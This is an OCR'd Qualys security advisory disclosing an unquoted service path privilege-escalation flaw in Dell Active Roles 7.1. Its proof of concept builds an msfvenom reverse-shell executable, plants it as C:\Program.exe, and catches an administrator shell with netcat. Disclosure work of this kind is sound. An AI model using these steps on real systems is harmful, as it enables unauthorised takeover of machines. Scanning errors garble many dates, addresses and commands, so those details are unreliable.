Qualys Security Advisory QSA-2017-07-01 


Saturday July 1*, 2017 


Dell Active Roles 7.x Unquoted Search Path Vulnerability 


SYNOPSIS: 


Dell Active Roles 7.1 uses a search path that contains an unquoted element, in which the element contains 
whitespace or other separators. This can cause the product to access resources in a parent path. 


Reference:- https://www.oneidentity.com/products/active-roles 


VULNERABILITY DETAILS: 


Lab Setup: 


1. Target: Dell ActiveRoles 7.1.2.3406 
2. Target IP Address: 10.113.14.112 


Vulnerable/Tested Version: 


Dell Active Roles 7.1.x running on Windows Server 2012. Older versions may also be affected. 


Panel » Programs » Programs and Features v È 


Uninstall or change a program 


To uninstall a program, select it from the list and then click Uninstall, Change, or Repair. 


Organize + — Uninstall/Change 


^ 


Name Publisher Installed On Size Version 

[9] Dell Active Roles 7.1 — — za Dell Software Inc. 6/15/2017. 231MB 7.12.3406 
(3j Microsoft ODBC Driver 11 for SQL Server Microsoft Corporation 6/15/2017 4.61 MB 12.0.2000.8 
(3j Microsoft SQL Server 2008 Setup Support Files Microsoft Corporation 6/15/2017 38.9MB  10.3.5500.0 
(3 Microsoft SQL Server 2012 Native Client Microsoft Corporation 6/15/2017 9.68MB 11.1.3000.0 


Vulnerability: Unquoted Search Path Vulnerability 


The 'Active Roles Synchronization Service' uses a search path that contains an unquoted element, in which 
the element contains whitespace or other separators. This can cause the product to access resources in a 
parent path. 


File Action View Help 


es (aus Bm > sun 


5, Services (Local) 


Active Roles Synchronization Name E Description Status Startup Type Log On As ^ 

Service 3, Active Directory Domain Services ADDSDom.. Running Automatic Local System s 
C Active Directory Web Services This service... Running Automatic Local System 

Stop the service Gj, Active Roles Administration Service Active Roles... Running Automatic ACTIVEROLES\administrator 

Restart the service 


$3 Active Roles Synchronization Service Active Roles.. Runninc Automatic ACTIVEROLES\administrator 


© Application Experience Processes a... Manual (Trig... Local System 


Service name: ARSyncSvc 
Display name: Active Roles Synchronization Service 


Description: ive Roles component that performs data A 
chronization and replication tasks to enable user, > 


Path to executable: 


C:\Program Files\Dell\Active Roles\7.1\SyncService\! 


o 


SyncServic 


Help me configure service startup options. 


Service status: Running 


Start | | Pause Resume 


You can specify the start parameters that apply when you start the service 
from here. 


Start parameters 


Risk Factor: High 


Impact: 


If a malicious individual has access to the file system, it is possible to elevate privileges by inserting such a 
file as "C:\Program.exe" to be run by a privileged program making use of WinExec. 


CVSS Score: AV: L/AC: L/AU: S/C:C/I: C/A:C 


Proof-Of-Concept: 


1. Log into the target with a low privileged account which has access to the file system. 


ic:\Users\testuser>net users testuser 

User name testuser 

Full Name Test User 

Comment 

User’s comment 

Country/region code BBB <System Default»? 
Account active Yes 

Account expires Never 


Password last set 77172817 12:17:35 AM 
Password expires Never 

Password changeable 7/2/2617 12:17:35 AM 
Password required Yes 

User may change password No 

Workstations allowed All 

Logon script 

User profile 

Home directory 

Last logon 2/1/2017 12:17:46 AM 


Logon hours allowed All 

Local Group Memberships 

Global Group memberships *Domain Users 
The command completed successfully. 

ic :\Users\testuser>ipconfig 


Windows IP Configuration 


Ethernet adapter Etherneti: 


Media: State. e e e o ee 24020 Media disconnected 
Connection-specific DNS Suffix 


Ethernet adapter Ethernet@: 


Connection-specific DNS Suffix 
Link-local IPv6 Address ... 
IPv4 Address. - . . . . . . +. 
Subnet Mask . . 

Default Gateway 


fe805::b51d:26aa:277hb:adWOd12 
192.168.253.132 
255.255.255.0 

192.168.253.2 


Create an executable file using MSFVenom. 


root@kali: ~/Desktop 


File Edit View Search Terminal Help 

root@kali: # msfvenom -p windows/x64/shell reverse tcp LHOST=192.168.100.6 LPORT=443 -f exe > Program. ex§ 
E 

No platform was selected, choosing Msf::Module::Platform::Windows from the payload 

No Arch selected, selecting Arch: x64 from the payload 

No encoder or badchars specified, outputting raw payload 

Payload size: 460 bytes 

Final size of exe file: 7168 bytes 


root@kali: £g 


Copy this file to C: drive on the target machine. 


Application Tools 


Home View Manage e 
(€) Y» ^T i » Computer » Local Disk (C:) v Search Local Disk (C:) S | 

do Favorites Name Date modified Type Size 

BE Desktop di inetpub 6/15/2017 4:05 PM File folder 

[$ Downloads Ji PerfLogs 7/26/2012 12:44 AM File folder 

=| Recent places Lo Program Files 6/16/2017 12:02 AM File folder 

de Program Files (x86) 6/16/2017 12:03 AM File folder 

3 Libraries ¿Le Users 6/16/2017 12:30 AM File folder 

-*| Documents Jo Windows 6/15/2017 4:05PM — File folder 

A) Music (= Program.exe 6/17/2017 2:26 AM Application 7KB 

&| Pictures 


4. Wait for System reboot or admin to restart Active Roles Synchronization Service. 


5. The target machine sends reverse shell after the reboot or when service is restarted. 


G:\Users\Administrator>netstat —anbo | find "443" 

ESTABLISHED 
.8.8:66443 
-6.6:61443 
1:62443 
1:63443 
1:64438 


9.0 
0.8 
[:: 
KH 
Esa 


root@kali: ~/Desktop oot 


File Edit View Search Terminal Help 

root@kali:-/Desktop# nc -nvlp 443 

listening on [any] 443 ... 

connect to [192.168.100.6] from (UNKNOWN) [192.168.100.4] 60605 
Microsoft Windows [Version 6.2.9200] 

(c) 2012 Microsoft Corporation. All rights reserved. 


C:\Windows\system32>whoami 
whoami 
activeroles\administrator 


C:\Windows\system32>hostname 
hostname 
WIN-QCVFKGJCS8A 


C:\Windows\system32>ipconfig 
ipconfig 


Windows IP Configuration 


Ethernet adapter Ethernetl: 


Media State . . . . . . . . . . . : Media disconnected 
Connection-specific DNS Suffix 


Ethernet adapter Ethernet®: 


Connection-specific DNS Suffix 

Link-local IPv6 Address . . . . . : fe80::b51d:26aa:277b:ad0d%12 
IPVA Address: 5 4 2 2 22628.22192716822532132 

Subnet Mask. 2 $ 5 e. e s o o rk s 2 ZO 289 B 

Default Gateway . . . . . . . . . : 192.168.253.2 


CREDITS: 


The discovery and documentation of this vulnerability was conducted by Kapil Khot, Qualys 
Vulnerability Signature/Research Team. 


CONTACT: 


For more information about the Qualys Security Research Team, visit our website at 
http://www.qualys.com or send email to research 9 qualys.com 


LEGAL NOTICE: 


The information contained within this advisory is Copyright (C) 2017 Qualys Inc. It may be redistributed 
provided that no fee is charged for distribution and that the advisory is not modified in any way. 


